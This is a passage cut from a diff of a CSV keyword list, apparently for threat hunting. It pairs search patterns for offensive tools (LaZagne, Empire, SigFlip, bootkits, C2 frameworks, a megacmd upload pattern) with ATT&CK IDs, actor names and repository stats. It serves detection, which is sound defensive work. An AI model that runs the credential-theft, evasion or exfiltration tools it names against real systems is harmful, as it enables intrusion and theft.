scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*masscan* -p*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" "*massdns -r *.txt*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*master/bootkit/src*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","448","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" -"*master/EncryptedZIP*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. 
This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*master/HookDetector*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*master/ImplantSSP/*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*master/SwampThing*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*master/UnquotedPath*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*master/bootkit/src*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*master/EncryptedZIP*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. 
This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*master/HookDetector*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*master/ImplantSSP/*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*master/SwampThing*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*master/UnquotedPath*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*matterpreter*","offensive_tool_keyword","Github Username","github username hosting offensive tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/matterpreter","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*matterpreter/DefenderCheck*","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*matterpreter/Shhmon*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*MattKeeley/Spoofy*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*MayankPandey01/Jira-Lens*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA 
written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" "*mbrg/power-pwn*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" -"*mcafee_epo2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mcafee_epo2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*McpManagementPotato.*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" -"*Md4-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Md5-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*mDNSSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Md4-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Md5-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mDNSSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*MDSDLL_x64.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*MDSDLL_x86.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*mdsecactivebreach*","offensive_tool_keyword","Github Username","MDSecs ActiveBreach Team. 
own a github repo with lots of exploitation tools https://www.mdsec.co.uk/services/red-teaming/","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mdsecactivebreach/CACTUSTORCH*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*mdsecactivebreach/Farmer*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*med0x2e/GadgetToJScript*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" -"*med0x2e/SigFlip*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*med0x2e/SigFlip*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching 
authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*med0x2e/SigFlip*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*med0x2e/SigFlip*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*media_variable_file_cryptography.py*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" "*megacmd -conf * put *mega:*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - 
T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*megadose/holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" -"*megadose@protonmail.com*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*megadose/holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*megadose@protonmail.com*","offensive_tool_keyword","holehe","holehe allows 
you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" "*meliht/Mr.SIP*","offensive_tool_keyword","Mr.SIP","Mr.SIP is a simple console based SIP-based Audit and Attack Tool. Originally it was developed to be used in academic work to help developing novel SIP-based DDoS attacks and then as an idea to convert it to a fully functional SIP-based penetration testing tool. So far Mr SIP resulted several academic research papers. and journal articles. Mr.SIP can also be used as SIP client simulator and SIP traffic generator.","T1522 - T1521 - T1523 - T1505 - T1506","TA0010 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/meliht/Mr.SIP","1","1","N/A","N/A","4","366","100","2023-05-21T08:11:20Z","2017-09-07T18:23:00Z" -"*Memcrashed-DDoS-Exploit*","offensive_tool_keyword","Memcrashed-DDoS-Exploit","This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io","T1436 - T1498 - T1216 - T1190","TA0043 - TA0044 - TA0001","N/A","N/A","Exploitation tools","https://github.com/649/Memcrashed-DDoS-Exploit","1","1","N/A","N/A","10","1278","493","2022-12-02T07:14:59Z","2018-03-02T21:19:51Z" +"*Memcrashed-DDoS-Exploit*","offensive_tool_keyword","Memcrashed-DDoS-Exploit","This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io","T1436 - T1498 - T1216 - T1190","TA0043 - TA0044 - TA0001","N/A","N/A","Exploitation tools","https://github.com/649/Memcrashed-DDoS-Exploit","1","1","N/A","N/A","10","1279","493","2022-12-02T07:14:59Z","2018-03-02T21:19:51Z" "*memfd implant *.elf*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - 
T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*memfd task *.elf*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*memory*mimipy.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*memory/onepassword.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*memorydump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*memory*mimipy.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*memory/onepassword.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used 